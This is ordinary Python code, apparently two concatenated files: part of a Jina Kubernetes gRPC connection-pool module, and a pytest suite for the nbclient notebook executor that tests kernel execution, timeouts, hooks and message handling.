is_deleted
and self._pod_is_up(item)
and deployment_name in self._deployment_clusteraddresses
):
self._remove_pod_connection(deployment_name, item)
def _remove_pod_connection(self, deployment_name, item):
target = item.status.pod_ip
connection_pool = self._connections[
self._deployment_clusteraddresses[deployment_name]
]
if connection_pool.has_connection(f'{target}:{connection_pool.port}'):
self._logger.debug(
f'Removing connection to {target}:{connection_pool.port} for deployment {deployment_name} at {self._deployment_clusteraddresses[deployment_name]}'
)
self._connections[
self._deployment_clusteraddresses[deployment_name]
].remove_connection(f'{target}:{connection_pool.port}')
def _add_pod_connection(self, deployment_name, item):
target = item.status.pod_ip
connection_pool = self._connections[
self._deployment_clusteraddresses[deployment_name]
]
if not connection_pool.has_connection(f'{target}:{connection_pool.port}'):
self._logger.debug(
f'Adding connection to {target}:{connection_pool.port} for deployment {deployment_name} at {self._deployment_clusteraddresses[deployment_name]}'
)
connection_pool.add_connection(
f'{target}:{connection_pool.port}',
self._create_connection(target=f'{target}:{connection_pool.port}'),
)
def _extract_app(self, service_item):
if service_item.metadata.annotations:
return ast.literal_eval(
list(service_item.metadata.annotations.values())[0]
)['spec']['selector']['app']
elif service_item.metadata.labels:
return service_item.metadata.labels['app']
return None
def _find_cluster_ip(self, deployment_name):
service_resp = self._k8s_client.list_namespaced_service(self._namespace)
for s in service_resp.items:
app = self._extract_app(s)
if app and deployment_name == app and s.spec.cluster_ip:
# find the port-in for this deployment
for p in s.spec.ports:
if p.name == 'port-in':
return s.spec.cluster_ip, p.port
return None, None
def is_remote_local_connection(first: str, second: str):
"""
Decides, whether ``first`` is remote host and ``second`` is localhost
:param first: the ip or host name of the first runtime
:param second: the ip or host name of the second runtime
:return: True, if first is remote and second is local
"""
try:
first_ip = ipaddress.ip_address(first)
first_global = first_ip.is_global
except ValueError:
if first == 'localhost':
first_global = False
else:
first_global = True
try:
second_ip = ipaddress.ip_address(second)
second_local = second_ip.is_private or second_ip.is_loopback
except ValueError:
if second == 'localhost':
second_local = True
else:
second_local = False
return first_global and second_local
def get_connect_host(
bind_host: str,
bind_expose_public: bool,
connect_args: Namespace,
) -> str:
"""
Compute the host address for ``connect_args``
:param bind_host: the ip for binding
:param bind_expose_public: True, if bind socket should be exposed publicly
:param connect_args: configuration for the host ip connection
:return: host ip
"""
runs_in_docker = connect_args.runs_in_docker
# by default __default_host__ is 0.0.0.0
# is BIND at local
bind_local = bind_host == __default_host__
# is CONNECT at local
conn_local = connect_args.host == __default_host__
# is CONNECT inside docker?
# check if `uses` has 'docker://' or,
# it is a remote pea managed by jinad. (all remote peas are inside docker)
conn_docker = (
(
getattr(connect_args, 'uses', None) is not None
and (
connect_args.uses.startswith('docker://')
or connect_args.uses.startswith('jinahub+docker://')
)
)
or not conn_local
or runs_in_docker
)
# is BIND & CONNECT all on the same remote?
bind_conn_same_remote = (
not bind_local and not conn_local and (bind_host == connect_args.host)
)
# pod1 in local, pod2 in local (conn_docker if pod2 in docker)
if bind_local and conn_local:
return __docker_host__ if conn_docker else __default_host__
# pod1 and pod2 are remote but they are in the same host (pod2 is local w.r.t pod1)
if bind_conn_same_remote:
return __docker_host__ if conn_docker else __default_host__
if bind_local and not conn_local:
# in this case we are telling CONN (at remote) our local ip address
if connect_args.host.startswith('localhost'):
# this is for the "psuedo" remote tests to pass
return __docker_host__
return get_public_ip() if bind_expose_public else get_internal_ip()
else:
# in this case we (at local) need to know about remote the BIND address
return bind_host
def create_connection_pool(args: 'Namespace') -> ConnectionPool:
"""
Creates the appropriate connection pool based on args
:param args: Arguments for this pod
:return: A connection pool object
"""
if args.k8s_namespace and args.k8s_connection_pool:
from jina.peapods.pods.k8slib.kubernetes_client import K8sClients
k8s_clients = K8sClients()
return K8sGrpcConnectionPool(
namespace=args.k8s_namespace,
client=k8s_clients.core_v1,
)
else:
return GrpcConnectionPool()
|
test_client.py | import asyncio
import concurrent.futures
import copy
import datetime
import functools
import os
import re
import threading
import warnings
from base64 import b64decode, b64encode
from queue import Empty
from unittest.mock import MagicMock, Mock
import nbformat
import pytest
import xmltodict
from jupyter_client import KernelManager
from jupyter_client.kernelspec import KernelSpecManager
from nbconvert.filters import strip_ansi
from nbformat import NotebookNode
from testpath import modified_env
from traitlets import TraitError
from .. import NotebookClient, execute
from ..exceptions import CellExecutionError
from .base import NBClientTestsBase
addr_pat = re.compile(r'0x[0-9a-f]{7,9}')
current_dir = os.path.dirname(__file__)
ipython_input_pat = re.compile(
r'(<ipython-input-\d+-[0-9a-f]+>|<IPY-INPUT>) in (<module>|<cell line: \d>\(\))'
)
# Tracebacks look different in IPython 8,
# see: https://github.com/ipython/ipython/blob/master/docs/source/whatsnew/version8.rst#traceback-improvements # noqa
ipython8_input_pat = re.compile(
r'(Input In \[\d+\]|<IPY-INPUT>), in (<module>|<cell line: \d>\(\))'
)
hook_methods = [
"on_cell_start",
"on_cell_execute",
"on_cell_complete",
"on_cell_error",
"on_notebook_start",
"on_notebook_complete",
"on_notebook_error",
]
class AsyncMock(Mock):
pass
def make_async(mock_value):
async def _():
return mock_value
return _()
def normalize_base64(b64_text):
# if it's base64, pass it through b64 decode/encode to avoid
# equivalent values from being considered unequal
try:
return b64encode(b64decode(b64_text.encode('ascii'))).decode('ascii')
except (ValueError, TypeError):
return b64_text
def run_notebook(filename, opts, resources=None):
"""Loads and runs a notebook, returning both the version prior to
running it and the version after running it.
"""
with open(filename) as f:
input_nb = nbformat.read(f, 4)
cleaned_input_nb = copy.deepcopy(input_nb)
for cell in cleaned_input_nb.cells:
if 'execution_count' in cell:
del cell['execution_count']
cell['outputs'] = []
if resources:
opts = {'resources': resources, **opts}
executor = NotebookClient(cleaned_input_nb, **opts)
with warnings.catch_warnings():
# suppress warning from jupyter_client's deprecated cleanup()
warnings.simplefilter(action='ignore', category=FutureWarning)
# Override terminal size to standardise traceback format
with modified_env({'COLUMNS': '80', 'LINES': '24'}):
output_nb = executor.execute()
return input_nb, output_nb
def run_notebook_wrapper(args):
# since concurrent.futures.ProcessPoolExecutor doesn't have starmap,
# we need to unpack the arguments
return run_notebook(*args)
async def async_run_notebook(filename, opts, resources=None):
"""Loads and runs a notebook, returning both the version prior to
running it and the version after running it.
"""
with open(filename) as f:
input_nb = nbformat.read(f, 4)
cleaned_input_nb = copy.deepcopy(input_nb)
for cell in cleaned_input_nb.cells:
if 'execution_count' in cell:
del cell['execution_count']
cell['outputs'] = []
if resources:
opts = {'resources': resources, **opts}
executor = NotebookClient(cleaned_input_nb, **opts)
# Override terminal size to standardise traceback format
with modified_env({'COLUMNS': '80', 'LINES': '24'}):
output_nb = await executor.async_execute()
return input_nb, output_nb
def prepare_cell_mocks(*messages_input, reply_msg=None):
"""
This function prepares a executor object which has a fake kernel client
to mock the messages sent over zeromq. The mock kernel client will return
the messages passed into this wrapper back from ``preproc.kc.iopub_channel.get_msg``
callbacks. It also appends a kernel idle message to the end of messages.
"""
parent_id = 'fake_id'
messages = list(messages_input)
# Always terminate messages with an idle to exit the loop
messages.append({'msg_type': 'status', 'content': {'execution_state': 'idle'}})
def shell_channel_message_mock():
# Return the message generator for
# self.kc.shell_channel.get_msg => {'parent_header': {'msg_id': parent_id}}
return AsyncMock(
return_value=make_async(
NBClientTestsBase.merge_dicts(
{
'parent_header': {'msg_id': parent_id},
'content': {'status': 'ok', 'execution_count': 1},
},
reply_msg or {},
)
)
)
def iopub_messages_mock():
# Return the message generator for
# self.kc.iopub_channel.get_msg => messages[i]
return AsyncMock(
side_effect=[
# Default the parent_header so mocks don't need to include this
make_async(
NBClientTestsBase.merge_dicts({'parent_header': {'msg_id': parent_id}}, msg)
)
for msg in messages
]
)
def prepared_wrapper(func):
@functools.wraps(func)
def test_mock_wrapper(self):
"""
This inner function wrapper populates the executor object with
the fake kernel client. This client has its iopub and shell
channels mocked so as to fake the setup handshake and return
the messages passed into prepare_cell_mocks as the execute_cell loop
processes them.
"""
cell_mock = NotebookNode(
source='"foo" = "bar"', metadata={}, cell_type='code', outputs=[]
)
executor = NotebookClient({})
executor.nb = {'cells': [cell_mock]}
# self.kc.iopub_channel.get_msg => message_mock.side_effect[i]
message_mock = iopub_messages_mock()
executor.kc = MagicMock(
iopub_channel=MagicMock(get_msg=message_mock),
shell_channel=MagicMock(get_msg=shell_channel_message_mock()),
execute=MagicMock(return_value=parent_id),
is_alive=MagicMock(return_value=make_async(True)),
)
executor.parent_id = parent_id
return func(self, executor, cell_mock, message_mock)
return test_mock_wrapper
return prepared_wrapper
def normalize_output(output):
"""
Normalizes outputs for comparison.
"""
output = dict(output)
if 'metadata' in output:
del output['metadata']
if 'text' in output:
output['text'] = re.sub(addr_pat, '<HEXADDR>', output['text'])
if 'text/plain' in output.get('data', {}):
output['data']['text/plain'] = re.sub(addr_pat, '<HEXADDR>', output['data']['text/plain'])
if 'application/vnd.jupyter.widget-view+json' in output.get('data', {}):
output['data']['application/vnd.jupyter.widget-view+json']['model_id'] = '<MODEL_ID>'
if 'image/svg+xml' in output.get('data', {}):
output['data']['image/svg+xml'] = xmltodict.parse(output['data']['image/svg+xml'])
for key, value in output.get('data', {}).items():
if isinstance(value, str):
output['data'][key] = normalize_base64(value)
if 'traceback' in output:
tb = []
for line in output["traceback"]:
line = re.sub(ipython_input_pat, '<IPY-INPUT>', strip_ansi(line))
line = re.sub(ipython8_input_pat, '<IPY-INPUT>', strip_ansi(line))
tb.append(line)
output['traceback'] = tb
return output
def assert_notebooks_equal(expected, actual):
expected_cells = expected['cells']
actual_cells = actual['cells']
assert len(expected_cells) == len(actual_cells)
for expected_cell, actual_cell in zip(expected_cells, actual_cells):
# Uncomment these to help debug test failures better
# from pprint import pprint
# pprint(expected_cell)
# pprint(actual_cell)
expected_outputs = expected_cell.get('outputs', [])
actual_outputs = actual_cell.get('outputs', [])
normalized_expected_outputs = list(map(normalize_output, expected_outputs))
normalized_actual_outputs = list(map(normalize_output, actual_outputs))
assert normalized_expected_outputs == normalized_actual_outputs
expected_execution_count = expected_cell.get('execution_count', None)
actual_execution_count = actual_cell.get('execution_count', None)
assert expected_execution_count == actual_execution_count
def notebook_resources():
"""
Prepare a notebook resources dictionary for executing test
notebooks in the ``files`` folder.
"""
return {'metadata': {'path': os.path.join(current_dir, 'files')}}
def filter_messages_on_error_output(err_output):
allowed_lines = [
# ipykernel migh be installed without debugpy extension
"[IPKernelApp] WARNING | debugpy_stream undefined, debugging will not be enabled",
]
filtered_result = [line for line in err_output.splitlines() if line not in allowed_lines]
return os.linesep.join(filtered_result)
@pytest.mark.parametrize(
["input_name", "opts"],
[
("Other Comms.ipynb", dict(kernel_name="python")),
("Clear Output.ipynb", dict(kernel_name="python")),
("Empty Cell.ipynb", dict(kernel_name="python")),
("Factorials.ipynb", dict(kernel_name="python")),
("HelloWorld.ipynb", dict(kernel_name="python")),
("Inline Image.ipynb", dict(kernel_name="python")),
(
"Interrupt.ipynb",
dict(kernel_name="python", timeout=1, interrupt_on_timeout=True, allow_errors=True),
),
("JupyterWidgets.ipynb", dict(kernel_name="python")),
("Skip Exceptions with Cell Tags.ipynb", dict(kernel_name="python")),
("Skip Exceptions.ipynb", dict(kernel_name="python", allow_errors=True)),
("Skip Execution with Cell Tag.ipynb", dict(kernel_name="python")),
("SVG.ipynb", dict(kernel_name="python")),
("Unicode.ipynb", dict(kernel_name="python")),
("UnicodePy3.ipynb", dict(kernel_name="python")),
("update-display-id.ipynb", dict(kernel_name="python")),
("Check History in Memory.ipynb", dict(kernel_name="python")),
],
)
def test_run_all_notebooks(input_name, opts):
"""Runs a series of test notebooks and compares them to their actual output"""
input_file = os.path.join(current_dir, 'files', input_name)
input_nb, output_nb = run_notebook(input_file, opts, notebook_resources())
assert_notebooks_equal(input_nb, output_nb)
def test_parallel_notebooks(capfd, tmpdir):
"""Two notebooks should be able to be run simultaneously without problems.
The two notebooks spawned here use the filesystem to check that the other notebook
wrote to the filesystem."""
opts = dict(kernel_name="python")
input_name = "Parallel Execute {label}.ipynb"
input_file = os.path.join(current_dir, "files", input_name)
res = notebook_resources()
with modified_env({"NBEXECUTE_TEST_PARALLEL_TMPDIR": str(tmpdir)}):
threads = [
threading.Thread(target=run_notebook, args=(input_file.format(label=label), opts, res))
for label in ("A", "B")
]
for t in threads:
t.start()
for t in threads:
t.join(timeout=2)
captured = capfd.readouterr()
assert filter_messages_on_error_output(captured.err) == ""
def test_many_parallel_notebooks(capfd):
"""Ensure that when many IPython kernels are run in parallel, nothing awful happens.
Specifically, many IPython kernels when run simultaneously would encounter errors
due to using the same SQLite history database.
"""
opts = dict(kernel_name="python", timeout=5)
input_name = "HelloWorld.ipynb"
input_file = os.path.join(current_dir, "files", input_name)
res = NBClientTestsBase().build_resources()
res["metadata"]["path"] = os.path.join(current_dir, "files")
with warnings.catch_warnings():
# suppress warning from jupyter_client's deprecated cleanup()
warnings.simplefilter(action='ignore', category=FutureWarning)
# run once, to trigger creating the original context
run_notebook(input_file, opts, res)
with concurrent.futures.ProcessPoolExecutor(max_workers=2) as executor:
executor.map(run_notebook_wrapper, [(input_file, opts, res) for i in range(8)])
captured = capfd.readouterr()
assert filter_messages_on_error_output(captured.err) == ""
def test_async_parallel_notebooks(capfd, tmpdir):
"""Two notebooks should be able to be run simultaneously without problems.
The two notebooks spawned here use the filesystem to check that the other notebook
wrote to the filesystem."""
opts = dict(kernel_name="python")
input_name = "Parallel Execute {label}.ipynb"
input_file = os.path.join(current_dir, "files", input_name)
res = notebook_resources()
with modified_env({"NBEXECUTE_TEST_PARALLEL_TMPDIR": str(tmpdir)}):
tasks = [
async_run_notebook(input_file.format(label=label), opts, res) for label in ("A", "B")
]
loop = asyncio.get_event_loop()
loop.run_until_complete(asyncio.gather(*tasks))
captured = capfd.readouterr()
assert filter_messages_on_error_output(captured.err) == ""
def test_many_async_parallel_notebooks(capfd):
"""Ensure that when many IPython kernels are run in parallel, nothing awful happens.
Specifically, many IPython kernels when run simultaneously would encounter errors
due to using the same SQLite history database.
"""
opts = dict(kernel_name="python", timeout=5)
input_name = "HelloWorld.ipynb"
input_file = os.path.join(current_dir, "files", input_name)
res = NBClientTestsBase().build_resources()
res["metadata"]["path"] = os.path.join(current_dir, "files")
# run once, to trigger creating the original context
run_notebook(input_file, opts, res)
tasks = [async_run_notebook(input_file, opts, res) for i in range(4)]
loop = asyncio.get_event_loop()
loop.run_until_complete(asyncio.gather(*tasks))
captured = capfd.readouterr()
assert filter_messages_on_error_output(captured.err) == ""
def test_execution_timing():
"""Compare the execution timing information stored in the cell with the
actual time it took to run the cell. Also check for the cell timing string
format."""
opts = dict(kernel_name="python")
input_name = "Sleep1s.ipynb"
input_file = os.path.join(current_dir, "files", input_name)
res = notebook_resources()
input_nb, output_nb = run_notebook(input_file, opts, res)
def get_time_from_str(s):
time_format = '%Y-%m-%dT%H:%M:%S.%fZ'
return datetime.datetime.strptime(s, time_format)
execution_timing = output_nb['cells'][1]['metadata']['execution']
status_busy = get_time_from_str(execution_timing['iopub.status.busy'])
execute_input = get_time_from_str(execution_timing['iopub.execute_input'])
execute_reply = get_time_from_str(execution_timing['shell.execute_reply'])
status_idle = get_time_from_str(execution_timing['iopub.status.idle'])
cell_start = get_time_from_str(output_nb['cells'][2]['outputs'][0]['text'])
cell_end = get_time_from_str(output_nb['cells'][3]['outputs'][0]['text'])
delta = datetime.timedelta(milliseconds=100)
assert status_busy - cell_start < delta
assert execute_input - cell_start < delta
assert execute_reply - cell_end < delta
assert status_idle - cell_end < delta
def test_synchronous_setup_kernel():
nb = nbformat.v4.new_notebook()
executor = NotebookClient(nb)
with executor.setup_kernel():
# Prove it initialized client
assert executor.kc is not None
# Prove it removed the client (and hopefully cleaned up)
assert executor.kc is None
def test_startnewkernel_with_kernelmanager():
nb = nbformat.v4.new_notebook()
km = KernelManager()
executor = NotebookClient(nb, km=km)
executor.start_new_kernel()
kc = executor.start_new_kernel_client()
# prove it initialized client
assert kc is not None
# since we are not using the setup_kernel context manager,
# cleanup has to be done manually
kc.shutdown()
km.cleanup_resources()
kc.stop_channels()
def test_start_new_kernel_history_file_setting():
nb = nbformat.v4.new_notebook()
km = KernelManager()
executor = NotebookClient(nb, km=km)
kc = km.client()
# Should start empty
assert executor.extra_arguments == []
# Should assign memory setting for ipykernel
executor.start_new_kernel()
assert executor.extra_arguments == ['--HistoryManager.hist_file=:memory:']
# Should not add a second hist_file assignment
executor.start_new_kernel()
assert executor.extra_arguments == ['--HistoryManager.hist_file=:memory:']
# since we are not using the setup_kernel context manager,
# cleanup has to be done manually
kc.shutdown()
km.cleanup_resources()
kc.stop_channels()
class TestExecute(NBClientTestsBase):
"""Contains test functions for execute.py"""
maxDiff = None
def test_constructor(self):
NotebookClient({})
def test_populate_language_info(self):
nb = nbformat.v4.new_notebook() # Certainly has no language_info.
executor = NotebookClient(nb, kernel_name="python")
nb = executor.execute()
assert 'language_info' in nb.metadata
def test_empty_path(self):
"""Can the kernel be started when the path is empty?"""
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
res = self.build_resources()
res['metadata']['path'] = ''
input_nb, output_nb = run_notebook(filename, {}, res)
assert_notebooks_equal(input_nb, output_nb)
@pytest.mark.xfail(
"python3" not in KernelSpecManager().find_kernel_specs(),
reason="requires a python3 kernelspec",
)
def test_empty_kernel_name(self):
"""Can kernel in nb metadata be found when an empty string is passed?
Note: this pattern should be discouraged in practice.
Passing in no kernel_name to NotebookClient is recommended instead.
"""
filename = os.path.join(current_dir, 'files', 'UnicodePy3.ipynb')
res = self.build_resources()
input_nb, output_nb = run_notebook(filename, {"kernel_name": ""}, res)
assert_notebooks_equal(input_nb, output_nb)
with pytest.raises(TraitError):
input_nb, output_nb = run_notebook(filename, {"kernel_name": None}, res)
def test_disable_stdin(self):
"""Test disabling standard input"""
filename = os.path.join(current_dir, 'files', 'Disable Stdin.ipynb')
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
input_nb, output_nb = run_notebook(filename, dict(allow_errors=True), res)
# We need to special-case this particular notebook, because the
# traceback contains machine-specific stuff like where IPython
# is installed. It is sufficient here to just check that an error
# was thrown, and that it was a StdinNotImplementedError
self.assertEqual(len(output_nb['cells']), 1)
self.assertEqual(len(output_nb['cells'][0]['outputs']), 1)
output = output_nb['cells'][0]['outputs'][0]
self.assertEqual(output['output_type'], 'error')
self.assertEqual(output['ename'], 'StdinNotImplementedError')
self.assertEqual(
output['evalue'],
'raw_input was called, but this frontend does not support input requests.',
)
def test_timeout(self):
"""Check that an error is raised when a computation times out"""
filename = os.path.join(current_dir, 'files', 'Interrupt.ipynb')
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
with pytest.raises(TimeoutError) as err:
run_notebook(filename, dict(timeout=1), res)
self.assertEqual(
str(err.value.args[0]),
"""A cell timed out while it was being executed, after 1 seconds.
The message was: Cell execution timed out.
Here is a preview of the cell contents:
-------------------
while True: continue
-------------------
""",
)
def test_timeout_func(self):
"""Check that an error is raised when a computation times out"""
filename = os.path.join(current_dir, 'files', 'Interrupt.ipynb')
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
def timeout_func(source):
return 10
with pytest.raises(TimeoutError):
run_notebook(filename, dict(timeout_func=timeout_func), res)
def test_kernel_death_after_timeout(self):
"""Check that an error is raised when the kernel is_alive is false after a cell timed out"""
filename = os.path.join(current_dir, 'files', 'Interrupt.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
executor = NotebookClient(input_nb, timeout=1)
with pytest.raises(TimeoutError):
executor.execute()
km = executor.create_kernel_manager()
async def is_alive():
return False
km.is_alive = is_alive
# Will be a RuntimeError or subclass DeadKernelError depending
# on if jupyter_client or nbconvert catches the dead client first
with pytest.raises(RuntimeError):
input_nb, output_nb = executor.execute()
def test_kernel_death_during_execution(self):
"""Check that an error is raised when the kernel is_alive is false during a cell
execution.
"""
filename = os.path.join(current_dir, 'files', 'Autokill.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
executor = NotebookClient(input_nb)
with pytest.raises(RuntimeError):
executor.execute()
def test_allow_errors(self):
"""
Check that conversion halts if ``allow_errors`` is False.
"""
filename = os.path.join(current_dir, 'files', 'Skip Exceptions.ipynb')
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
with pytest.raises(CellExecutionError) as exc:
run_notebook(filename, dict(allow_errors=False), res)
self.assertIsInstance(str(exc.value), str)
assert "# üñîçø∂é" in str(exc.value)
def test_force_raise_errors(self):
"""
Check that conversion halts if the ``force_raise_errors`` traitlet on
NotebookClient is set to True.
"""
filename = os.path.join(current_dir, 'files', 'Skip Exceptions with Cell Tags.ipynb')
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(filename)
with pytest.raises(CellExecutionError) as exc:
run_notebook(filename, dict(force_raise_errors=True), res)
self.assertIsInstance(str(exc.value), str)
assert "# üñîçø∂é" in str(exc.value)
def test_reset_kernel_client(self):
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
executor = NotebookClient(
input_nb,
resources=self.build_resources(),
)
executor.execute(cleanup_kc=False)
# we didn't ask to reset the kernel client, a new one must have been created
kc = executor.kc
assert kc is not None
executor.execute(cleanup_kc=False)
# we didn't ask to reset the kernel client, the previously created one must have been reused
assert kc == executor.kc
executor.execute(reset_kc=True, cleanup_kc=False)
# we asked to reset the kernel client, the previous one must have been cleaned up,
# a new one must have been created
assert kc != executor.kc
def test_cleanup_kernel_client(self):
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
executor = NotebookClient(
input_nb,
resources=self.build_resources(),
)
executor.execute()
# we asked to cleanup the kernel client (default is True)
assert executor.kc is None
executor.execute(cleanup_kc=False)
# we didn't ask to reset the kernel client
# a new one must have been created and should still be available
assert executor.kc is not None
def test_custom_kernel_manager(self):
from .fake_kernelmanager import FakeCustomKernelManager
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
cleaned_input_nb = copy.deepcopy(input_nb)
for cell in cleaned_input_nb.cells:
if 'execution_count' in cell:
del cell['execution_count']
cell['outputs'] = []
executor = NotebookClient(
cleaned_input_nb,
resources=self.build_resources(),
kernel_manager_class=FakeCustomKernelManager,
)
# Override terminal size to standardise traceback format
with modified_env({'COLUMNS': '80', 'LINES': '24'}):
executor.execute()
expected = FakeCustomKernelManager.expected_methods.items()
for method, call_count in expected:
self.assertNotEqual(call_count, 0, f'{method} was called')
def test_process_message_wrapper(self):
outputs: list = []
class WrappedPreProc(NotebookClient):
def process_message(self, msg, cell, cell_index):
result = super().process_message(msg, cell, cell_index)
if result:
outputs.append(result)
return result
current_dir = os.path.dirname(__file__)
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
original = copy.deepcopy(input_nb)
wpp = WrappedPreProc(input_nb)
executed = wpp.execute()
assert outputs == [{'name': 'stdout', 'output_type': 'stream', 'text': 'Hello World\n'}]
assert_notebooks_equal(original, executed)
def test_execute_function(self):
# Test the execute() convenience API
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
original = copy.deepcopy(input_nb)
executed = execute(original, os.path.dirname(filename))
assert_notebooks_equal(original, executed)
def test_widgets(self):
"""Runs a test notebook with widgets and checks the widget state is saved."""
input_file = os.path.join(current_dir, 'files', 'JupyterWidgets.ipynb')
opts = dict(kernel_name="python")
res = self.build_resources()
res['metadata']['path'] = os.path.dirname(input_file)
input_nb, output_nb = run_notebook(input_file, opts, res)
output_data = [
output.get('data', {}) for cell in output_nb['cells'] for output in cell['outputs']
]
model_ids = [
data['application/vnd.jupyter.widget-view+json']['model_id']
for data in output_data
if 'application/vnd.jupyter.widget-view+json' in data
]
wdata = output_nb['metadata']['widgets']['application/vnd.jupyter.widget-state+json']
for k in model_ids:
d = wdata['state'][k]
assert 'model_name' in d
assert 'model_module' in d
assert 'state' in d
assert 'version_major' in wdata
assert 'version_minor' in wdata
def test_execution_hook(self):
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
hooks = [MagicMock() for i in range(7)]
executor = NotebookClient(input_nb)
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
executor.execute()
for hook in hooks[:3]:
hook.assert_called_once()
hooks[3].assert_not_called()
for hook in hooks[4:6]:
hook.assert_called_once()
hooks[6].assert_not_called()
def test_error_execution_hook_error(self):
filename = os.path.join(current_dir, 'files', 'Error.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
hooks = [MagicMock() for i in range(7)]
executor = NotebookClient(input_nb)
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
with pytest.raises(CellExecutionError):
executor.execute()
for hook in hooks[:5]:
hook.assert_called_once()
hooks[6].assert_not_called()
def test_error_notebook_hook(self):
filename = os.path.join(current_dir, 'files', 'Autokill.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
hooks = [MagicMock() for i in range(7)]
executor = NotebookClient(input_nb)
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
with pytest.raises(RuntimeError):
executor.execute()
for hook in hooks[:3]:
hook.assert_called_once()
hooks[3].assert_not_called()
for hook in hooks[4:]:
hook.assert_called_once()
def test_async_execution_hook(self):
filename = os.path.join(current_dir, 'files', 'HelloWorld.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
hooks = [AsyncMock() for i in range(7)]
executor = NotebookClient(input_nb)
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
executor.execute()
for hook in hooks[:3]:
hook.assert_called_once()
hooks[3].assert_not_called()
for hook in hooks[4:6]:
hook.assert_called_once()
hooks[6].assert_not_called()
def test_error_async_execution_hook(self):
filename = os.path.join(current_dir, 'files', 'Error.ipynb')
with open(filename) as f:
input_nb = nbformat.read(f, 4)
hooks = [AsyncMock() for i in range(7)]
executor = NotebookClient(input_nb)
for executor_hook, hook in zip(hook_methods, hooks):
setattr(executor, executor_hook, hook)
with pytest.raises(CellExecutionError):
executor.execute().execute()
for hook in hooks[:5]:
hook.assert_called_once()
hooks[6].assert_not_called()
class TestRunCell(NBClientTestsBase):
"""Contains test functions for NotebookClient.execute_cell"""
@prepare_cell_mocks()
def test_idle_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# Just the exit message should be fetched
assert message_mock.call_count == 1
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'execute_reply'},
'parent_header': {'msg_id': 'wrong_parent'},
'content': {'name': 'stdout', 'text': 'foo'},
}
)
def test_message_for_wrong_parent(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An ignored stream followed by an idle
assert message_mock.call_count == 2
# Ensure no output was written
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'status',
'header': {'msg_type': 'status'},
'content': {'execution_state': 'busy'},
}
)
def test_busy_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# One busy message, followed by an idle
assert message_mock.call_count == 2
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stderr', 'text': 'bar'},
},
)
def test_deadline_exec_reply(self, executor, cell_mock, message_mock):
# exec_reply is never received, so we expect to hit the timeout.
async def get_msg(timeout):
await asyncio.sleep(timeout)
raise Empty
executor.kc.shell_channel.get_msg = get_msg
executor.timeout = 1
with pytest.raises(TimeoutError):
executor.execute_cell(cell_mock, 0)
assert message_mock.call_count == 3
# Ensure the output was captured
self.assertListEqual(
cell_mock.outputs,
[
{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'},
{'output_type': 'stream', 'name': 'stderr', 'text': 'bar'},
],
)
@prepare_cell_mocks()
def test_deadline_iopub(self, executor, cell_mock, message_mock):
# The shell_channel will complete, so we expect only to hit the iopub timeout.
message_mock.side_effect = Empty()
executor.raise_on_iopub_timeout = True
with pytest.raises(TimeoutError):
executor.execute_cell(cell_mock, 0)
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stderr', 'text': 'bar'},
},
)
def test_eventual_deadline_iopub(self, executor, cell_mock, message_mock):
# Process a few messages before raising a timeout from iopub
def message_seq(messages):
yield from messages
while True:
yield Empty()
message_mock.side_effect = message_seq(list(message_mock.side_effect)[:-1])
executor.kc.shell_channel.get_msg = Mock(
return_value=make_async({'parent_header': {'msg_id': executor.parent_id}})
)
executor.raise_on_iopub_timeout = True
with pytest.raises(TimeoutError):
executor.execute_cell(cell_mock, 0)
assert message_mock.call_count >= 3
# Ensure the output was captured
self.assertListEqual(
cell_mock.outputs,
[
{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'},
{'output_type': 'stream', 'name': 'stderr', 'text': 'bar'},
],
)
@prepare_cell_mocks(
{'msg_type': 'execute_input', 'header': {'msg_type': 'execute_input'}, 'content': {}}
)
def test_execute_input_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# One ignored execute_input, followed by an idle
assert message_mock.call_count == 2
# Ensure no outputs were generated
assert cell_mock.outputs == []
